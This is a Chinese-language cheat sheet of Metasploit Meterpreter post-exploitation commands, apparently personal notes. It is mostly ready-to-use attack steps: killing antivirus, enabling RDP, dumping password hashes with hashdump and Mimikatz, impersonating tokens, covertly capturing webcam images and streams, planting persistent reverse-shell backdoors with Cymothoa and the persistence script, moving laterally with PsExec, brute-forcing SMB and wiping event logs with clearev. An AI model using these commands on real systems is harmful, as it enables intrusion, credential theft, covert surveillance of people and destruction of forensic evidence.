进程迁移: ps 获取进程 getpid shell的进程号 migrate 迁移 run post/windows/manage/migrate 自动迁移 shell之后: sysinfo 获取系统信息 run post/windows/gather/checkvm 查看目标是否允许在虚拟机 idletime 最近运行的时间 route 查看目录完整网络 getuid 当前用户名 run post/windows/manage/killav 关闭杀毒软件 run post/windows/manage/enable_rdp 开启3389 run post/windows/manage/autoroute 目标子网情况 background 隐藏后台 route add 添加路由 route print查看 run post/windows/gather/enum_logged_on_users 列举当前有多少用户登录过目标主机 run post/windows/gather/enum_applocations 列举安装在目标主机上 run post/windows/gather/credentials/windows_autologin 抓取自动登录的用户名密码 load espia screengrad 抓取此时屏幕截图 webcam_list 有无摄像头 webcam_snap 拍照 webcam_stream 开启直播模式 shell 进入目标shell 文件系统命令: pwd或getwd 目标主机当前处于哪个目录 getlwd 自己处于哪个目录 search -f *.txt -d c: 搜索c盘下所有txt文件 download c: est.txt /root 下载到本机 upload /root/text.txt c: 上传 权限提升: whoami/groups 查看当前权限 getuid 查看当前权限 getsystem 尝试提权 systeminfo 查看补丁 使用wmic 列出安装的补丁 令牌窃取: use incognito list_token -u 列出token impersonate_token +上述列出的有效令牌 假冒令牌攻击(需要两个\) 成功后运行shell Hash攻击: 1.使用hashdump 抓取密码 非SYSTEM运行时会失败 run windows/gather/smart_hashdump 导出域所有用户(windows7.开启UAC会导致失败) 2.Quarks PwDump 3.windows credentials Editor(WCE) 上传wce到目标。找到文件 wce -w 4.Mimikatz(管理员) load Mimikatz 加载 msv 抓取Hash kerberos 抓取系统票据 wdigest 获取系统账户信息 mimikatz_command -f samdump::hashed 抓取hash mimikatz_command -f handle::list 查看进程 mimikatz_command -f service::list windows 服务 mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz) 后门: 1.Cymothoa: cymothoa -p 982 -s 1 -y 4444 选择PID为982的进程为宿主进程,使用第一类Shellcode,指定反弹端口4444 nc -nvv 目标主机 4444 使用nc进行连接 2.Persistence: run persistence -A -S -U -i 60 -p 4321 -r 目标主机 A :自动启动payload程序 S :系统启动时自动加载 U :用户登录时自动启动 X :开机时自动加载 i :回连的时间间隔 P :监听反向连接端口号 r :目标主机 Web 后门: msf中使用generate生成 内网渗透: 信息收集: net user /domain : 查看域用户 net view /domain : 查看有几个域 net view /domain :xxx 查看域内主机 net group /domain : 查看域里面的组 net group "domain computers" /domain 查看域内所有的主机名 net group "domain admins " /domain 查看域管理员 net group "domain controllers" /domain 查看域控制器 net group "enterprise admins" /domain 查看企业管理器 nettime /domain 查看时间服务器 PowerShell 寻找域管在线服务 获取域管理权 登录域控制:使用msf中的PsExec 反弹Meterpreter SMB爆破内网: 先添加路由 然后使用smb_login 或psexec_scanner route add creds 清理日志: 删除所有用户 clearev 删除日志